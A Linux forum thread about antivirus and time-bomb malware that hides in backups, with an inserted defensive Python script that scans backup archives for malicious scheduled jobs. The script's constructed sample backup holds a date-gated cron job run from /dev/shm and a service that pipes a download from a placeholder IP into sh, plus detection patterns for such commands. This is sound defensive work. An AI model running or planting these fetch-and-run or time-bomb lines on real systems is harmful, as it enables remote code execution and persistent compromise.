I know that Linux is more secure than Windows and normally doesn’t need an antivirus, but knowing myself I’m gonna end up downloading something at some point from somewhere on the internet, and it would be good to be prepared. So, which antivirus would you recommend for Linux (Mint specifically) just to double up on security?

  • golden_zealot@lemmy.ml
    7 days ago

    There are viruses that are time-bombs. They specifically don’t really do anything until some criterion is met in the future, such as the current date being beyond a specific date, at which point they proc. They do this in order to make sure they are in your backups when you restore them, so that they immediately run when recovery is completed and the system is booted.

    • utopiah@lemmy.ml
      7 days ago

      That doesn’t make much sense to me; one backs up data, not executables or the system. Even if they were to be saved in the backup, they wouldn’t get executed again.

      Anyway, that’s still conceptually interesting but it’s so very niche I’d be curious to hear where it’s being used, any reference to read on where those exist in the wild?

      • golden_zealot@lemmy.ml
        7 days ago

        They usually embed themselves within the system files and have some scheduled job that basically checks for the criteria. If you are only backing up and restoring user data then it’s a non-issue, but if you do a full recovery including the system files, the system scheduler etc., then it can happen, and it is often necessary to back up executable and system files for production environments (true, not so much for individual users and their systems).

        When I was working in an IT shop, one of our clients was ransomwared with this method. The saving grace for us in that instance was that our backups were going to a product that allowed you to easily break open and dissect the compressed backups pre-recovery, so we were able to determine where the malicious files were and kill them before pushing the backups. Of course we only noticed that it was in the backups after we had tried to push the backups once already, so it was quite the time-consuming process; I think I worked for something like 18 hours that day.

        You can read about such malware if you search for “timebomb malware” or “malware does not execute until date” etc.

        The attack is not super common anymore, but still happens.

        For example, here is an article discussing time bomb methods on LinkedIn.

        https://www.linkedin.com/pulse/time-bombs-malware-delayed-execution-any-run

        Another on the knowbe4 blog:

        https://blog.knowbe4.com/ransomware-can-destroy-backups-in-four-ways
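The "break open and dissect the compressed backups pre-recovery" step described in the post above, as an added example that is not code from the thread or from any backup product: a script that opens a system backup tarball read-only (nothing is extracted to disk), pulls out the cron entries and systemd unit files inside it, and flags jobs that run from world-writable directories, are gated on a future date, decode an embedded payload, or pipe a download to a shell. The archive layout, the scheduler paths and the indicator patterns are assumptions; the sample backup is constructed inline so the example runs offline.

```python
"""Inspect scheduled jobs inside a system backup archive before restoring it.

Added example (not from the thread). Assumptions: the backup is a tar archive
with an FHS-style layout, and the heuristics below are a starting point, not a
complete list of indicators.
"""
import io
import re
import tarfile

# Places a full system backup keeps scheduled jobs (assumed layout).
SCHEDULE_PREFIXES = (
    "etc/crontab", "etc/cron.d/", "etc/cron.hourly/", "etc/cron.daily/",
    "etc/cron.weekly/", "etc/cron.monthly/", "var/spool/cron/",
    "etc/systemd/system/",
)

# (pattern, reason) pairs; each hit becomes one finding.
INDICATORS = [
    (re.compile(r"/(?:tmp|var/tmp|dev/shm)/\S+"), "executes from a world-writable directory"),
    (re.compile(r"date\s+\+%s|-g[te]\s+\d{9,}"), "execution gated on an epoch timestamp (time bomb)"),
    (re.compile(r"base64\s+(?:-d|--decode)"), "decodes an embedded base64 payload"),
    (re.compile(r"(?:curl|wget)\b[^|]*\|\s*(?:ba)?sh\b"), "downloads and pipes to a shell"),
]


def _job_lines(name, text):
    """Yield (line_no, command_text) for lines that define a job.

    systemd units: only Exec* directives. Cron files and run-parts scripts:
    every non-comment line except environment assignments such as PATH=...
    """
    for no, raw in enumerate(text.splitlines(), 1):
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        if name.endswith((".service", ".timer")):
            if line.startswith(("ExecStart=", "ExecStartPre=", "ExecStartPost=")):
                yield no, line.split("=", 1)[1]
        elif not re.match(r"^[A-Za-z_][A-Za-z0-9_]*=", line):
            yield no, line


def scan_backup(archive):
    """Return findings for scheduler files inside a tar archive.

    `archive` is a path or a binary file object. Each finding is a tuple
    (member name, line number, offending line, reason); line 0 marks a
    file-level finding such as a hidden file dropped into a scheduler directory.
    """
    findings = []
    if hasattr(archive, "read"):
        tar = tarfile.open(fileobj=archive, mode="r:*")
    else:
        tar = tarfile.open(archive, mode="r:*")
    with tar:
        for member in tar:
            name = member.name.lstrip("./")
            if not member.isfile() or not name.startswith(SCHEDULE_PREFIXES):
                continue
            if name.rsplit("/", 1)[-1].startswith("."):
                findings.append((name, 0, "", "hidden file in a scheduler directory"))
            text = tar.extractfile(member).read().decode("utf-8", "replace")
            for no, cmd in _job_lines(name, text):
                for pattern, reason in INDICATORS:
                    if pattern.search(cmd):
                        findings.append((name, no, cmd, reason))
    return findings


def build_sample_backup():
    """Constructed sample backup (not a real capture) as an in-memory .tar.gz.

    Two benign entries, one hidden cron.d file that stays dormant until an epoch
    timestamp has passed, and a systemd service that pipes a download to sh.
    The IP is a documentation address (TEST-NET-2).
    """
    files = {
        "etc/crontab": "SHELL=/bin/sh\nPATH=/usr/sbin:/usr/bin:/sbin:/bin\n"
                       "17 *\t* * *\troot\tcd / && run-parts --report /etc/cron.hourly\n",
        "etc/cron.d/sysstat": "5-55/10 * * * * root command -v debian-sa1 > /dev/null && debian-sa1 1 1\n",
        "etc/cron.d/.kworker": "* * * * * root [ $(date +%s) -gt 1767225600 ] && /dev/shm/.cache/kworker\n",
        "etc/systemd/system/update-check.service": "[Unit]\nDescription=Update check\n[Service]\n"
                       "ExecStart=/bin/sh -c 'curl -fsSL http://198.51.100.7/u.sh | sh'\n",
        "etc/systemd/system/update-check.timer": "[Timer]\nOnCalendar=daily\n[Install]\nWantedBy=timers.target\n",
        "etc/hostname": "fileserver\n",
    }
    buf = io.BytesIO()
    with tarfile.open(fileobj=buf, mode="w:gz") as tar:
        for name, text in files.items():
            data = text.encode()
            info = tarfile.TarInfo(name)
            info.size = len(data)
            tar.addfile(info, io.BytesIO(data))
    buf.seek(0)
    return buf


if __name__ == "__main__":
    for name, no, line, reason in scan_backup(build_sample_backup()):
        print(f"{name}:{no}: {reason}\n    {line}")
```

Point `scan_backup` at a real archive path (`scan_backup("/mnt/backups/host-2024-05.tar.gz")`) to triage a backup before pushing it; because the archive is read through `tarfile` and never unpacked, nothing in it gets a chance to execute on the recovery host. Findings are a list to review by hand, not a verdict: a legitimate job can run from `/var/tmp`, and a dormant job can just as well be a plain binary dropped in `/etc/cron.hourly` that hides its date check inside itself, which is why the scan also reports hidden files in scheduler directories.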

        • utopiah@lemmy.ml
          7 days ago

          Thanks, it’s quite interesting, but again IMHO it relies on bad practices. If you’ve been compromised and you “restore” (not in a sandboxed environment dedicated to studying the threat), then you are asking for trouble. I’ll read a bit more in depth, but the timeline I see (1987, 1998, 2017) shows me this is a very very niche strategy, to the point that it’s basically irrelevant. Again, it’s good to know of it conceptually, but in practice proper backups (namely of data) remain in my eyes the best way to mitigate most problems, attacks and just bad luck (failing hardware, fire, etc.) alike.

          • golden_zealot@lemmy.ml
            7 days ago

            Oh for sure. I think that this method has more efficacy in production environments run by small businesses anyway, since best practices are rarely followed in many of them (until something happens that changes their mind on what they budget for, haha), and even at that it is still a rare attack to see.

            I am unaware of this type of attack ever occurring on a person’s personal network, most likely because so few end users make backups; there is no need to go through the trouble of doing this, making this method useful only in highly targeted attacks.

            We are definitely in agreement on proper backups still being the best method to recover from the vast majority of problems - even this one, depending on the backup solution.